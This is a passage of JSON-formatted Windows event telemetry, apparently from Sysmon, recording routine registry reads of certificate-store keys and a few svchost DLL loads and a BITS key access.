"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 
131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 
131883570901520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570901840000, - "unique_pid": 